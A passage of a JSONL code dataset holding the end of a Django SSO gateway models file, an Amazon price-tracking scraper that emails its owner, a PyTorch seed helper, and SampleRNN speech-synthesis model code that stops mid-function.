self._send_event(\n event_type='update_account',\n data=self.build_update_user_event(user)\n )\n\n def update_fields(self, to_users: Union[QuerySet, set], instance: ModelBase = None) -> bool:\n \"\"\"\n Send event with updated fields of the related model, if subordinated service is active\n \"\"\"\n if not self.enabled or not len(to_users):\n return True\n\n return self._send_event(\n event_type='update_fields',\n data=self.build_update_fields_event(to_users, instance)\n )\n\n @staticmethod\n def cast_event_to_all_services(event_name: str, **kwargs):\n assert len(event_name) and not event_name.startswith('_'), f\"Bad event name {event_name}\"\n\n if not hasattr(Service, event_name) or not isfunction(getattr(Service, event_name)):\n raise Exception(f'Django SSO: {Service.__class__.__name__} has no method {event_name}')\n\n for service in Service.objects.filter(enabled=True):\n getattr(service, event_name)(**kwargs)\n\n class Meta:\n verbose_name = _('Subordinated service')\n verbose_name_plural = _('Subordinated services')\n\n\ndef auth_token_generator():\n return get_random_string(AuthenticationRequest.token.field.max_length)\n\n\nclass AuthenticationRequest(models.Model):\n service: Service = models.ForeignKey('Service', on_delete=models.CASCADE, verbose_name=_('Service'))\n created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), default=auth_token_generator, unique=True)\n user_identy = models.CharField(max_length=128, verbose_name=_('User identy'), help_text=_('E-Mail, login, etc.'))\n next_url = models.CharField(max_length=512, verbose_name=_('Next url'), help_text=_('To go after success auth'))\n authenticated = models.BooleanField(default=False, verbose_name=_('Request has been activated'))\n used = models.BooleanField(default=False, verbose_name=_('Are used in external sso service'))\n\n class Meta:\n verbose_name = _('Authentication request')\n verbose_name_plural = _('Authentication requests')\n\n def activate(self, user: User):\n \"\"\"\n 1) Activate authentication request\n 2) Send base information about user to subordinated service\n \"\"\"\n self.user_identy = getattr(user, user_model.USERNAME_FIELD)\n self.authenticated = True\n self.save()\n\n try:\n return self.service.update_account(user)\n except Exception as e:\n raise SSOException(str(e))\n\n def __str__(self):\n return f'{_(\"Authenticate\")} {self.user_identy} {_(\"on\")} {self.service} {_(\"then go to\")} {self.next_url}'\n", "repo_name": "DAVIDhaker/django-sso", "sub_path": "src/django_sso/sso_gateway/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 11025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 19, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models.URLField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 39, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 77, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 99, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO", "line_number": 99, "usage_type": "attribute"}, {"api_name": "django.conf.settings.SSO", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 110, "usage_type": "name"}, {"api_name": "inspect.ismethod", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 128, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 136, "usage_type": "name"}, {"api_name": "django_sso.sso_gateway.Settings", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models.QuerySet", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 150, "usage_type": "call"}, {"api_name": "inspect.ismethod", "line_number": 173, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 194, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 208, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 244, "usage_type": "name"}, {"api_name": "inspect.isfunction", "line_number": 260, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 267, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 268, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 272, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 275, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 275, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 276, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 276, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 277, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 278, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 279, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 280, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 281, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 282, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 282, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 285, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 286, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 288, "usage_type": "name"}, {"api_name": "django_sso.exceptions.SSOException", "line_number": 300, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 303, "usage_type": "call"}]} +{"seq_id": "32555115650", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nURL = 'https://www.amazon.in/Apple-MacBook-16-inch-Storage-Intel-Core-i7/dp/B081JXDZFM/ref=sr_1_1_sspa?dchild=1&keywords=macbook&qid=1592241660&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUE3OE9EVDNFUzlMTDImZW5jcnlwdGVkSWQ9QTAyMDEzNTkxSkhVVUdSQ0xFSTJPJmVuY3J5cHRlZEFkSWQ9QTA0ODM5NTQyM0xFRFlBTlM1V09GJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0\"}\n\n\ndef check_price():\n page = requests.get(URL, headers=headers)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n # print(soup.prettify())\n\n productTitle = soup.find(id='productTitle').get_text()\n price = soup.find(id='priceblock_ourprice').get_text()\n temp = ''\n for n in price[2:-3]:\n if n != ',':\n temp += n\n productPrice = int(temp)\n\n if productPrice > 185000:\n send_email()\n\n print(productPrice)\n print(productTitle.strip())\n\n\ndef send_email():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('hraj2661999@gmail.com', 'RaNdOm_PaSsWoRd')\n\n subject = \"Price just fell down!\"\n body =\"Price just fell down!\\nCheck the link\"+URL\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n server.sendmail(\n 'hraj2661999@gmail.com',\n 'hraj2661999@gmail.com',\n msg\n )\n print('HEY! MAIL HAS BEEN SENT')\n\n server.quit()\n\nwhile(True):\n check_price()\n time.sleep(60*60*24)\n", "repo_name": "iamHrithikRaj/Python-App-That-Tracks-Amazon-Prices", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 1561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "74095533289", "text": "import random\nimport numpy as np\nimport torch\n\n# For reproducibility\ndef set_seed(s):\n random.seed(s)\n np.random.seed(s)\n torch.manual_seed(s)\n\n torch.cuda.manual_seed_all(s)\n #add additional seed\n torch.backends.cudnn.deterministic=True\n torch.use_deterministic_algorithms = True", "repo_name": "yaozhong/SCLSC", "sub_path": "code/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.use_deterministic_algorithms", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "27697231307", "text": "import numpy as np\nimport torch\nfrom .configuration import SampleRNNConfiguration\nfrom .utils import SampleRNNQuantizer, lecun_uniform, concat_init\nfrom typing import Dict\n\n\nclass FrameLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Frame level module of the SampleRNN architecture\"\"\"\n\n frame_input_samples: int\n frame_ratio: int\n rnn_layers: int\n rnn_hidden_size: int\n conds_size: int\n\n _samples_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _rnn_layer: torch.nn.GRU\n _rnn_layer_h0: torch.nn.Parameter\n\n _upsampling_layer: torch.nn.ConvTranspose1d\n _upsampling_layer_bias: torch.nn.Parameter\n\n def __init__(self, frame_input_samples: int, frame_ratio: int, rnn_layers: int, rnn_hidden_size: int,\n conds_size: int):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.frame_ratio = frame_ratio\n self.rnn_layers = rnn_layers\n self.rnn_hidden_size = rnn_hidden_size\n self.conds_size = conds_size\n\n # Create self._samples_expand_layer\n self._samples_expand_layer = torch.nn.Conv1d(\n in_channels=frame_input_samples,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._conds_expand_layer\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._rnn_layer\n self._rnn_layer = torch.nn.GRU(\n input_size=rnn_hidden_size,\n hidden_size=rnn_hidden_size,\n num_layers=rnn_layers,\n batch_first=True\n )\n\n # Create self._rnn_layer_h0\n self._rnn_layer_h0 = torch.nn.Parameter(torch.zeros(rnn_layers, rnn_hidden_size))\n\n # Create self._upsampling_layer\n self._upsampling_layer = torch.nn.ConvTranspose1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=frame_ratio,\n stride=frame_ratio,\n bias=False\n )\n\n # Create self._upsampling_layer_bias\n self._upsampling_layer_bias = torch.nn.Parameter(torch.FloatTensor(rnn_hidden_size, frame_ratio))\n\n # Reset Parameters\n self._upsampling_layer.reset_parameters()\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._samples_expand_layer.weight)\n torch.nn.init.constant_(self._samples_expand_layer.bias, 0)\n\n if self.conds_size is not None:\n torch.nn.init.kaiming_uniform_(self._conds_expand_layer.weight)\n torch.nn.init.constant_(self._conds_expand_layer.bias, 0)\n\n torch.nn.init.uniform_(\n self._upsampling_layer.weight,\n -np.sqrt(6 / self.rnn_hidden_size),\n np.sqrt(6 / self.rnn_hidden_size)\n )\n\n torch.nn.init.constant_(self._upsampling_layer_bias, 0)\n\n for i in range(self.rnn_layers):\n concat_init(\n getattr(self._rnn_layer, 'weight_ih_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, lecun_uniform]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_ih_l{}'.format(i)), 0)\n concat_init(\n getattr(self._rnn_layer, 'weight_hh_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, torch.nn.init.orthogonal_]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_hh_l{}'.format(i)), 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._samples_expand_layer = torch.nn.utils.weight_norm(self._samples_expand_layer)\n\n if self.conds_size is not None:\n self._conds_expand_layer = torch.nn.utils.weight_norm(self._conds_expand_layer)\n\n self._upsampling_layer = torch.nn.utils.weight_norm(self._upsampling_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning, rnn_hidden_state):\n \"\"\"FrameLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, sequence_length, frame_input_samples) containing the sample\n inputs of the sample level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * (prev) frame_ratio, rnn_hidden_size)\n rnn_hidden_state (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n\n Returns:\n upsampling_output (torch.Tensor): matrix of (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n rnn_hidden_state_new (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n \"\"\"\n\n # Obtain the batch size\n (batch_size, sequence_length, _) = input_samples.size()\n\n # Check if we have to upscale the conds\n if sequence_length != input_conds.shape[1]:\n upscale_ratio = int(input_samples.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, sequence_length, input_conds.shape[2])\n\n # samples_expand_output is (batch_size, sequence_length, rnn_hidden_size)\n samples_expand_output = self._samples_expand_layer(input_samples.permute(0, 2, 1)).permute(0, 2, 1)\n conds_expand_output = self._conds_expand_layer(input_conds.permute(0, 2, 1)).permute(0, 2, 1)\n\n # Check if the conds are available\n samples_expand_output += conds_expand_output\n\n # Add conditioning if exists\n if upper_tier_conditioning is not None:\n samples_expand_output += upper_tier_conditioning\n\n # Initialize hidden state tensor\n hidden_state_tensor = torch.zeros(self.rnn_layers, batch_size, self.rnn_hidden_size)\n\n # Move it to CUDA, if available\n if input_samples.is_cuda:\n hidden_state_tensor = hidden_state_tensor.cuda()\n\n # Iterate over hidden state list\n for hidden_state_item_index, hidden_state_item in enumerate(rnn_hidden_state):\n\n # If the item is None, initialize it\n if hidden_state_item is None:\n hidden_state_tensor[:, hidden_state_item_index, :] = self._rnn_layer_h0.unsqueeze(1)\n\n # If the item is not None, assign it\n else:\n hidden_state_tensor[:, hidden_state_item_index, :] = hidden_state_item.unsqueeze(1)\n\n # rnn_output is (batch_size, sequence_length, rnn_hidden_size)\n # rnn_hidden_state_new is (rnn_layers, batch_size, rnn_hidden_size)\n (rnn_output, rnn_hidden_state_new) = self._rnn_layer(samples_expand_output, hidden_state_tensor)\n\n # upsampling_bias is (batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n upsampling_bias = self._upsampling_layer_bias.unsqueeze(0).unsqueeze(2) \\\n .expand(batch_size, self.rnn_hidden_size, sequence_length, self.frame_ratio) \\\n .contiguous().view(batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n\n # upsampling_output is (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n upsampling_output = (self._upsampling_layer(rnn_output.permute(0, 2, 1)) + upsampling_bias).permute(0, 2, 1)\n\n # Return the output and the new hidden state\n return upsampling_output, rnn_hidden_state_new\n\n\nclass SampleLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Sample level module of the SampleRNN architecture\"\"\"\n\n # Integer containining the number of samples entering the sample level module\n frame_input_samples: int\n conds_size: int\n rnn_hidden_size: int\n q_levels: int\n\n # Embedding layer used to transform from (batch_size, 1059) to (batch_size, 1059, embedding_dim)\n _embedding_layer: torch.nn.Embedding\n\n _embedding_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _inputs_comb_layer: torch.nn.Linear\n\n _global_expand_layer: torch.nn.Conv1d\n _adaptation_layer: torch.nn.Conv1d\n _logsoftmax_layer: torch.nn.LogSoftmax\n\n def __init__(self, frame_input_samples: int, conds_size: int, rnn_hidden_size: int, q_levels: int):\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.conds_size = conds_size\n self.rnn_hidden_size = rnn_hidden_size\n self.q_levels = q_levels\n\n # Create Torch objects\n self._embedding_layer = torch.nn.Embedding(num_embeddings=q_levels, embedding_dim=q_levels)\n\n # lala\n self._embedding_expand_layer = torch.nn.Conv1d(\n in_channels=q_levels,\n out_channels=rnn_hidden_size,\n kernel_size=frame_input_samples, bias=False\n )\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lele\n self._inputs_comb_layer = torch.nn.Linear(\n in_features=self.rnn_hidden_size * 3,\n out_features=self.rnn_hidden_size\n )\n\n # Lolo\n self._global_expand_layer = torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lulu\n self._adaptation_layer = torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=q_levels,\n kernel_size=1\n )\n\n # Lele\n self._softmax_layer = torch.nn.LogSoftmax(dim=2)\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._embedding_expand_layer.weight)\n\n torch.nn.init.kaiming_uniform_(self._global_expand_layer.weight)\n torch.nn.init.constant_(self._global_expand_layer.bias, 0)\n\n lecun_uniform(self._adaptation_layer.weight)\n torch.nn.init.constant_(self._adaptation_layer.bias, 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._embedding_expand_layer = torch.nn.utils.weight_norm(self._embedding_expand_layer)\n self._global_expand_layer = torch.nn.utils.weight_norm(self._global_expand_layer)\n self._adaptation_layer = torch.nn.utils.weight_norm(self._adaptation_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning):\n \"\"\"SampleLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, 1059) containing the sample inputs of the sample\n level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * frame_size, rnn_hidden_size)\n\n Returns:\n\n \"\"\"\n # Obtain the batch size\n batch_size, _ = input_samples.size()\n\n # Upscale the Conds\n upscale_ratio = int(upper_tier_conditioning.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, upper_tier_conditioning.shape[1], input_conds.shape[2])\n\n # embedding_output is ()\n embedding_output = self._embedding_layer(input_samples.contiguous().view(-1)) \\\n .view(batch_size, -1, self.q_levels)\n\n # Expand both Samples and Conds\n embedding_expand_output = self._embedding_expand_layer(embedding_output.permute(0, 2, 1))\n conds_expand_output = self._conds_expand_layer(input_conds.permute(0, 2, 1))\n\n # Apply Fully-Connected to Samples, Conds and UpperTier\n inputs_comb_output = self._inputs_comb_layer(torch.cat(\n (embedding_expand_output.permute(0, 2, 1), conds_expand_output.permute(0, 2, 1), upper_tier_conditioning),\n dim=2)\n )\n inputs_comb_output = torch.nn.functional.relu(inputs_comb_output)\n\n # global_expand_output is ()\n global_expand_output = self._global_expand_layer(inputs_comb_output.permute(0, 2, 1))\n global_expand_output = torch.nn.functional.relu(global_expand_output)\n\n # adaptation_output is ()\n adaptation_output = self._adaptation_layer(global_expand_output)\n\n # Apply the LogSoftMax layer and return the result as (batch_size, sequence_length * frame_size, ,q_levels)\n return self._softmax_layer(adaptation_output.permute(0, 2, 1))\n\n\nclass SampleRNNModel(torch.nn.Module):\n \"\"\"General module of the SampleRNN architecture\"\"\"\n\n # Lala\n conf: SampleRNNConfiguration\n quantizer: SampleRNNQuantizer\n\n conds_linguistic_phonemes: torch.nn.Embedding\n conds_linguistic_vowels: torch.nn.Embedding\n conds_linguistic_gpos: torch.nn.Embedding\n conds_linguistic_tobi: torch.nn.Embedding\n\n _conds_adaptation_layer: torch.nn.Linear\n\n frame_level_layers: torch.nn.ModuleList\n sample_level_layer: SampleLevelSampleRNNModel\n\n frame_level_hidden_states: Dict\n\n def __init__(self, conf: SampleRNNConfiguration, quantizer: SampleRNNQuantizer, conds_linguistic_n=None):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.conf = conf\n self.quantizer = quantizer\n\n # Initialize parameters for FrameLevelLayers\n self.frame_level_layers = torch.nn.ModuleList()\n self.conds_linguistic_phonemes = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[0],\n embedding_dim=self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n )\n self.conds_linguistic_vowels = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[1],\n embedding_dim=self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n )\n self.conds_linguistic_gpos = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[2],\n embedding_dim=self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n )\n self.conds_linguistic_tobi = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[3],\n embedding_dim=self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n )\n\n # Create the Conds Adaptation Layer\n self._conds_adaptation_layer = torch.nn.Linear(\n in_features=self.conf.conditionants['utterance_size_expanded'] + self.conf.conditionants['speaker_size'],\n out_features=self.conf.conditionants['global_size']\n )\n\n # Lala\n for layer_n in range(0, len(self.conf.architecture['frame_layers_fs'])):\n self.frame_level_layers.append(\n FrameLevelSampleRNNModel(\n frame_input_samples=self.conf.architecture['frame_layers_fs'][layer_n],\n frame_ratio=self.conf.architecture['frame_layers_ratios'][layer_n],\n rnn_layers=self.conf.architecture['frame_layers_rnn_layers'][layer_n],\n rnn_hidden_size=self.conf.architecture['frame_layers_rnn_hidden_size'][layer_n],\n conds_size=self.conf.conditionants['global_size']\n )\n )\n\n # Initialize SampleLevelRNN\n self.sample_level_layer = SampleLevelSampleRNNModel(\n frame_input_samples=conf.architecture['frame_layers_ratios'][0],\n conds_size=self.conf.conditionants['global_size'],\n rnn_hidden_size=conf.architecture['frame_layers_rnn_hidden_size'][0],\n q_levels=conf.quantizer['q_levels']\n )\n\n # Initialize Hidden States\n self.frame_level_hidden_states = None\n\n def _get_frame_level_hidden_states(self, frame_level_layer, reset_list):\n\n # Define returned Tensor\n frame_level_layer_hidden_state = []\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # If the element is False, get stored item\n if reset_element == 0:\n frame_level_layer_hidden_state.append(self.frame_level_hidden_states[frame_level_layer][reset_index])\n\n # If the element is True, set None to that element\n elif reset_element == 1:\n frame_level_layer_hidden_state.append(None)\n\n # Return the list\n return frame_level_layer_hidden_state\n\n def _set_frame_level_hidden_states(self, new_hidden_state_tensor, frame_level_layer: FrameLevelSampleRNNModel,\n reset_list):\n\n # Create aux var\n last_hidden_state = 0\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # Assign only if reset_element == 1 or 0\n if reset_element == 0 or reset_element == 1:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = \\\n new_hidden_state_tensor[:, last_hidden_state, :]\n last_hidden_state += 1\n else:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = None\n\n def _format_linguistic_features(self, input_conds):\n # Create aux conds Tensor\n input_conds_aux = torch.zeros(\n (input_conds.shape[0], input_conds.shape[1], self.conf.conditionants['utterance_size_expanded'])\n )\n\n # Shorcuts for embedding sizes\n phonemes_size = self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n vowels_size = self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n gpos_size = self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n tobi_size = self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n\n # Define aux variable\n last_index = 0\n\n # Append CATEGORICAL features at the beginning\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 2].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 3].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 4].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 5].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 6].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + vowels_size] = self.conds_linguistic_vowels(\n input_conds[:, :, 27].long())\n last_index += vowels_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 31].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 33].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + gpos_size] = self.conds_linguistic_gpos(\n input_conds[:, :, 41].long())\n last_index += gpos_size\n\n input_conds_aux[:, :, last_index:last_index + tobi_size] = self.conds_linguistic_tobi(\n input_conds[:, :, 49].long())\n last_index += tobi_size\n\n # Append REAL and BOOL features after the embeddings\n input_conds_aux[:, :, last_index:last_index + 2] = input_conds[:, :, 0:2]\n last_index += 2\n\n input_conds_aux[:, :, last_index:last_index + 20] = input_conds[:, :, 7:27]\n last_index += 20\n\n input_conds_aux[:, :, last_index:last_index + 3] = input_conds[:, :, 28:31]\n last_index += 3\n\n input_conds_aux[:, :, last_index:last_index + 1] = input_conds[:, :, 32:33]\n last_index += 1\n\n input_conds_aux[:, :, 